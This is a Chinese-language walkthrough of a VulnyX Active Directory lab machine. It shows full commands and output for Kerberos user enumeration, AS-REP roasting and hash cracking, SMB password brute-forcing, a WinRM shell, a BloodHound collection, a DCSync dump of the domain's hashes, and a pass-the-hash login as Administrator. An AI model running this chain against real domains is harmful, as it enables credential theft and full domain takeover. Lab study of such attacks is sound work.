靶机下载地址https://vulnyx.com/file/Controler.php。
这篇walkthrough是跟着靶机作者的wp写的,算是学习加记录,linux靶机玩多了换换win靶机,感觉挺有意思。
扫描端口。
└─$ nmap -sV -sC -Pn -p- -oN port.log 192.168.56.139
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-01 13:13 CST
Nmap scan report for control.nyx (192.168.56.139)
Host is up (0.00032s latency).
Not shown: 65510 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-01 20:13:42Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: control.nyx0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: control.nyx0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49672/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
49682/tcp open msrpc Microsoft Windows RPC
49697/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:62:32:E9 (Oracle VirtualBox virtual NIC)
Service Info: Host: CONTROLER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 14h59m57s
| smb2-time:
| date: 2024-11-01T20:14:36
|_ start_date: N/A
|_nbstat: NetBIOS name: CONTROLER, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:62:32:e9 (Oracle VirtualBox virtual NIC)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
值得关注的是88/kerberos、389/ldap、445/smb。信息里提示了Domain: control.nyx
,把这个域名加入/etc/hosts。下面enum各种服务和关键信息,先来看smb,没有可用的共享。
└─$ netexec smb $IP
SMB 192.168.56.139 445 CONTROLER [*] Windows 10 / Server 2019 Build 17763 x64 (name:CONTROLER) (domain:control.nyx) (signing:True) (SMBv1:False)
└─$ smbclient -NL 192.168.56.139
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.56.139 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
再看看rpc,也没得到有用信息。
└─$ rpcclient -N -U "" $IP -c "querydispinfo"
result was NT_STATUS_ACCESS_DENIED
└─$ rpcclient -N -U "" $IP -c "enumdomusers"
result was NT_STATUS_ACCESS_DENIED
再来看LDAP。
└─$ ldapsearch -x -H "ldap://$IP" -s base
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: ALL
#
#
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=control,DC=nyx
ldapServiceName: control.nyx:controler$@CONTROL.NYX
...
namingContexts: DC=control,DC=nyx
namingContexts: CN=Configuration,DC=control,DC=nyx
namingContexts: CN=Schema,CN=Configuration,DC=control,DC=nyx
namingContexts: DC=DomainDnsZones,DC=control,DC=nyx
namingContexts: DC=ForestDnsZones,DC=control,DC=nyx
isSynchronized: TRUE
highestCommittedUSN: 73754
dsServiceName: CN=NTDS Settings,CN=CONTROLER,CN=Servers,CN=Default-First-Site-
Name,CN=Sites,CN=Configuration,DC=control,DC=nyx
dnsHostName: Controler.control.nyx
defaultNamingContext: DC=control,DC=nyx
currentTime: 20241101203821.0Z
configurationNamingContext: CN=Configuration,DC=control,DC=nyx
再来看kerberos,在列举用户名时,用到了kerberos一个常用用户名字典https://raw.githubusercontent.com/attackdebris/kerberos_enum_userlists/refs/heads/master/A-Z.Surnames.txt
,最发现一个用户b.lewis
。
└─$ kerbrute_linux_amd64 userenum --dc $IP -d control.nyx A-Z.Surnames.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 11/01/24 - Ronnie Flathers @ropnop
2024/11/01 13:44:53 > Using KDC(s):
2024/11/01 13:44:53 > 192.168.56.139:88
2024/11/01 13:44:53 > [+] VALID USERNAME: B.LEWIS@control.nyx
2024/11/01 13:45:02 > Done! Tested 13000 usernames (1 valid) in 8.709 second
下面要用到AS-REP Roasting攻击。基本原理是:
AS-REP Roasting是一种对用户账户进行离线爆破的攻击方式。但是该攻击方式使用上比较受限,因为其需要用户账户设置不要求Kerberos 预身份验证选项,而该选项默认是没有勾选的。Kerberos 预身份验证发生在 Kerberos 身份验证的第一阶段(AS_REQ&AS REP),它的主要作用是防止密码离线爆破。默认情况下,预身份验证是开启的,KDC 会记录密码错误次数,防止在线爆破。
当关闭了预身份验证后,攻击者可以使用指定用户向域控制器的 Kerberos 88 端口请求票据,此时域控不会进行任何验证就将 TGT 和该用户 Hash 加密的 Login Session Key 返回。因此,攻击者就可以对获取到的用户 Hash 加密的 Login Session Key 进行离线破解,如果字典够强大,则可能破解得到该指定用户的明文密码
使用Impacket脚本,可以得到该用户的密码hash。
└─$ echo "b.lewis" > user.dic
└─$ impacket-GetNPUsers control.nyx/ -no-pass -usersfile user.dic
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
/usr/share/doc/python3-impacket/examples/GetNPUsers.py:165: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
$krb5asrep$23$b.lewis@CONTROL.NYX:cafe0af2e965c8b30ab392fcd306bb65$4cf870350488dd5ef75b8698a5955e7fa7c881da679e2ff04584acdce215d62745bce14880882e291087fd6b15b9cc1e6ebbb54ff9384a28fb501f551959a1b654bcdb93e830d63a2f085dc36d59843dbbfb2701aec4bd95cb427ebefd3027585915d925db075bcacbd8983d78ddbc258bbb627d3dd7dd5a83679bacb032ad30f7b65659c4f4bede49b49e0b45bc51e013a17bb3bbc1dc62cddb28e573907727759201972e26c6f6aac2b750f99a2109ae0224c88307be5bc50e7bcab2bb4a39f40333df131cbcb7715e07b5ffe51de755ce8f89b8fee766cb55031e1143e5aa387364c23f1523bd4ea7
对hash进行破解,得到密码。
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE2 4x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
101Music ($krb5asrep$23$b.lewis@CONTROL.NYX)
1g 0:00:00:13 DONE (2024-11-01 13:53) 0.07173g/s 965362p/s 965362c/s 965362C/s 101eagles..101Mromally
Use the "--show" option to display all of the cracked passwords reliably
可以验证,该用户名和密码可以使用smb服务,但winrm服务依旧连接不上。
└─$ netexec smb $IP -u 'b.lewis' -p '101Music'
SMB 192.168.56.139 445 CONTROLER [*] Windows 10 / Server 2019 Build 17763 x64 (name:CONTROLER) (domain:control.nyx) (signing:True) (SMBv1:False)
SMB 192.168.56.139 445 CONTROLER [+] control.nyx\b.lewis:101Music
└─$ netexec winrm $IP -u 'b.lewis' -p '101Music'
WINRM 192.168.56.139 5985 CONTROLER [*] Windows 10 / Server 2019 Build 17763 (name:CONTROLER) (domain:control.nyx)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 192.168.56.139 5985 CONTROLER [-] control.nyx\b.lewis:101Music
使用rpc服务可以进一步枚举用户。
└─$ rpcclient -U "b.lewis%101Music" $IP -c "enumdomusers"
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[j.levy] rid:[0x44f]
user:[b.lewis] rid:[0x450]
user:[m.klein] rid:[0x451]
user:[d.petrov] rid:[0x452]
user:[a.hansen] rid:[0x453]
┌──(kali㉿mykali)-[~/Documents/controler]
└─$ rpcclient -U "b.lewis%101Music" $IP -c "querydispinfo"
index: 0xfb1 RID: 0x453 acb: 0x00000211 Account: a.hansen Name: Axel Hansen Desc: (Account Disabled)
index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: (Account Enabled)
index: 0xfae RID: 0x450 acb: 0x00010210 Account: b.lewis Name: Ben Lewis Desc: (Account Enabled)
index: 0xfb0 RID: 0x452 acb: 0x00000211 Account: d.petrov Name: Dave Petrov Desc: (Account Disabled)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: (Account Disabled)
index: 0xfac RID: 0x44f acb: 0x00000210 Account: j.levy Name: John Levy Desc: (Account Enabled)
index: 0xf10 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0xfaf RID: 0x451 acb: 0x00000211 Account: m.klein Name: Mike Klein Desc: (Account Disabled)
可以发现j.levy
和b.lewis
是有效的,其它用户名是不可用的。可以爆破得到j.levy
的smb密码。
└─$ netexec smb $IP -u 'j.levy' -p /usr/share/wordlists/rockyou.txt --ignore-pw-decoding -t 10
...
SMB 192.168.56.139 445 CONTROLER [+] control.nyx\j.levy:Password1
j.levy
可以连接winrm。
└─$ netexec winrm $IP -u 'j.levy' -p 'Password1'
WINRM 192.168.56.139 5985 CONTROLER [*] Windows 10 / Server 2019 Build 17763 (name:CONTROLER) (domain:control.nyx)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 192.168.56.139 5985 CONTROLER [+] control.nyx\j.levy:Password1 (Pwn3d!
└─$ evil-winrm -i 192.168.56.139 -u 'j.levy' -p 'Password1'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\j.levy\Documents> whoami
control\j.levy
上传SharpHound到靶机,运行并采集信息。
*Evil-WinRM* PS C:\Users\j.levy\Documents> upload Shar
pHound.exe
Info: Uploading /home/kali/Documents/controler/SharpHound.exe to C:\Users\j.levy\Documents\SharpHound.exe
Data: 1402880 bytes of 1402880 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\j.levy\Documents> .\SharpHound.exe
2024-11-01T14:13:02.3921638-07:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2024-11-01T14:13:02.4574862-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-11-01T14:13:02.4574862-07:00|INFORMATION|Initializing SharpHound at 2:13 PM on 11/1/2024
2024-11-01T14:13:02.5592260-07:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for control.nyx : Controler.control.nyx
2024-11-01T14:13:02.6911408-07:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-11-01T14:13:02.7181923-07:00|INFORMATION|Beginning LDAP search for control.nyx
2024-11-01T14:13:02.7655606-07:00|INFORMATION|Producer has finished, closing LDAP channel
2024-11-01T14:13:02.7655606-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-11-01T14:13:33.0039549-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 35 MB RAM
2024-11-01T14:13:48.3628044-07:00|INFORMATION|Consumers finished, closing output channel
2024-11-01T14:13:48.4043452-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2024-11-01T14:13:48.4539005-07:00|INFORMATION|Status: 95 objects finished (+95 2.111111)/s -- Using 51 MB RAM
2024-11-01T14:13:48.4539005-07:00|INFORMATION|Enumeration finished in 00:00:45.6989181
2024-11-01T14:13:48.4881995-07:00|INFORMATION|Saving cache with stats: 54 ID to type mappings.
54 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2024-11-01T14:13:48.4881995-07:00|INFORMATION|SharpHound Enumeration Completed at 2:13 PM on 11/1/2024! Happy Graphing!
*Evil-WinRM* PS C:\Users\j.levy\Documents> dir
Directory: C:\Users\j.levy\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/1/2024 2:13 PM 11381 20241101141348_BloodHound.zip
-a---- 11/1/2024 2:13 PM 8136 MWMwNWZhMWQtNWU5Yi00ZGZhLTgzZDEtMDE5NjRmMmE2NWEw.bin
-a---- 11/1/2024 2:12 PM 1052160 SharpHound.exe
*Evil-WinRM* PS C:\Users\j.levy\Documents> download 20241101141348_BloodHound.zip
Info: Downloading C:\Users\j.levy\Documents\20241101141348_BloodHound.zip to 20241101141348_BloodHound.zip
Info: Download successful!
采集的zip文件解压后,是几个json文件。使用jq命令可以查看相关信息,并注意到j.levy用户具有AllExtenedRights。
└─$ jq "." 20241101141348_users.json
{
"Properties": {
"domain": "CONTROL.NYX",
"name": "J.LEVY@CONTROL.NYX",
"distinguishedname": "CN=JOHN LEVY,CN=USERS,DC=CONTROL,DC=NYX",
"domainsid": "S-1-5-21-2142633474-2248127568-3584646925",
"highvalue": false,
"samaccountname": "j.levy",
...
{
"PrincipalSID": "CONTROL.NYX-S-1-5-32-544",
"PrincipalType": "Group",
"RightName": "AllExtendedRights",
"IsInherited": true
},
由于j.levy的权限较高,可以dump管理员的hash。这里要注意命令的语法:secretsdump DOMAIN/USER:PASSWORD@DOMAINCONTROLLER
。
└─$ impacket-secretsdump control.nyx/j.levy:Password1@CONTROL.NYX -target-ip 192.168.56.139
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:48b20d4f3ea31b7234c92b71c90fbff7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b70cca1e5225303104dea9942d31f3a7:::
control.nyx\j.levy:1103:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
control.nyx\b.lewis:1104:aad3b435b51404eeaad3b435b51404ee:08f37c649690b7df615961f71831ef4a:::
control.nyx\m.klein:1105:aad3b435b51404eeaad3b435b51404ee:48b20d4f3ea31b7234c92b71c90fbff7:::
control.nyx\d.petrov:1106:aad3b435b51404eeaad3b435b51404ee:48b20d4f3ea31b7234c92b71c90fbff7:::
control.nyx\a.hansen:1107:aad3b435b51404eeaad3b435b51404ee:48b20d4f3ea31b7234c92b71c90fbff7:::
CONTROLER$:1000:aad3b435b51404eeaad3b435b51404ee:97a43247d14c80f991b4e6ccbc61f8be:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9a8c983c709e851258912c3b1d71c9b05faf1724f522b4f32e57f7bef3366773
Administrator:aes128-cts-hmac-sha1-96:0ca176565c5b47fda5e2ab4f53fbb9d3
Administrator:des-cbc-md5:ce9785d980c1a7f8
krbtgt:aes256-cts-hmac-sha1-96:98eaf007fcf3006a8526cba84496bffc6835fbb9f6291c4a5c467be83c10e6ac
krbtgt:aes128-cts-hmac-sha1-96:4f348630f6cf1829080f97ad008432c0
krbtgt:des-cbc-md5:6bdaae6d83f7ce08
control.nyx\j.levy:aes256-cts-hmac-sha1-96:0e6ca71073eab87d2e5195b9da28498dfa76a62f7e5d5bd22b6fb2c05677daa0
control.nyx\j.levy:aes128-cts-hmac-sha1-96:7a0a723a44a010bb3da571a16f6edefb
control.nyx\j.levy:des-cbc-md5:54918ae57a10f2bf
control.nyx\b.lewis:aes256-cts-hmac-sha1-96:b4f57e910e3bdea0ad3bdc1ad2513759f2f88eb8650f5f470ac08f9b210a2198
control.nyx\b.lewis:aes128-cts-hmac-sha1-96:7f2031c82ee5bc662dc3cd7cc3235a66
control.nyx\b.lewis:des-cbc-md5:a4132f64d5ce670b
control.nyx\m.klein:aes256-cts-hmac-sha1-96:4a793709dcdcf73950b685f896a9848e3103d5a18b01c7e5d59ba38c57b8672b
control.nyx\m.klein:aes128-cts-hmac-sha1-96:57aeb83d17ac7f9ca2a6b9237d40dc70
control.nyx\m.klein:des-cbc-md5:f19bdfdad5d3b0a1
control.nyx\d.petrov:aes256-cts-hmac-sha1-96:33fe5c70d3443ebe7ecde982ac1bd96b56827d38144666f8a6b8826950697f3a
control.nyx\d.petrov:aes128-cts-hmac-sha1-96:bc33a875e59d41c1a601fd7a2519d659
control.nyx\d.petrov:des-cbc-md5:c29d76f7b62aab92
control.nyx\a.hansen:aes256-cts-hmac-sha1-96:fd82c8b8af1452f8eede5b2ad82a7a9d0a82a3f6bfcd3a69d075f88fd40b0fe6
control.nyx\a.hansen:aes128-cts-hmac-sha1-96:8606d5df957b06541cbb988be5835c80
control.nyx\a.hansen:des-cbc-md5:34e05b94b37564c1
CONTROLER$:aes256-cts-hmac-sha1-96:0966cc16ce2ab931b9b5caa42e22478abb604cd827a4126ffabff95bcc973b6c
CONTROLER$:aes128-cts-hmac-sha1-96:c995e40cf30c060da31419be4db19d68
CONTROLER$:des-cbc-md5:ec5e1658b34f1f20
利用管理员的hash,可以登录得到root。
└─$ evil-winrm -i 192.168.56.139 -u 'administrator' -H 48b20d4f3ea31b7234c92b71c90fbff7
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
control\administrator
顺便补充个小知识,impacket-secretsdump 通常输出的格式如下:用户名:RID:LM哈希:NTLM哈希:::其他信息
。
用户名:用户账户名(如Administrator)。
RID:用户的相对标识符 (Relative Identifier),是 Windows 安全标识符 (SID) 的一部分,通常用于唯一标识一个账户。
LM哈希:LAN Manager 哈希,较为老旧且安全性较低。通常在现代系统中为空(aad3b435b51404eeaad3b435b51404ee 表示空 LM 哈希)。
NTLM哈希:NT LAN Manager 哈希,是 Windows 系统中更为常见的哈希格式,用于存储用户密码的散列值。
其他信息:一些额外的信息,通常包括历史哈希、服务凭据等。